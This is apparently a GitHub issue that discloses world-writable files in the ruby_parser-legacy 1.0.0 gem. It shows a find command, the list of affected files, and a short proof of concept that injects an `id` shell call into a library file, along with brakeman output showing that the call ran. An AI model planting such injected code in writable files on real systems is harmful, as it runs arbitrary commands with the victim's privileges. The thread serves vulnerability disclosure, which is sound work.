Security Issue : invalid permission on ruby files

[fwininger]

Hi,

This gem has world writable files in the release 1.0.0.

how to reproduce the issue

find . -xdev -type f -perm -0002

./ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_parser.rb
./ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_lexer.rex
./ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_lexer.rb
./ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_parser_extras.rb
./ruby_parser-legacy-1.0.0/test/ruby_parser/test_ruby_parser.rb
./ruby_parser-legacy-1.0.0/test/ruby_parser/test_legacy.rb
./ruby_parser-legacy-1.0.0/test/ruby_parser/test_ruby_lexer.rb
./ruby_parser-legacy-1.0.0/test/ruby_parser/test_ruby_parser_extras.rb

exploitation poc

add in ./ruby_parser-legacy-1.0.0/lib/ruby_parser/legacy/ruby_parser.rb

puts "Code execution with : #{%x(id)}"

require the gem in a other projet may run the shell code with the user privilege.

$ brakeman
Loading scanner...
Code execution with : uid=1000(xxxx) gid=1000(xxxx) groups=1000(xxxx)
Please supply the path to a Rails application (looking in /home/xxxx/).

Please release a new release asap.

[pboling]

@418sec - I am not able to find a bounty for this issue. I am confused about the comment your bot left.

[JamieSlome]

Hello @pboling - thanks for reaching out. Apologies, this comment was made in error.

We have since changed the way our @huntr-helper works significantly and expect this won't happen again.

Cheers! 🍰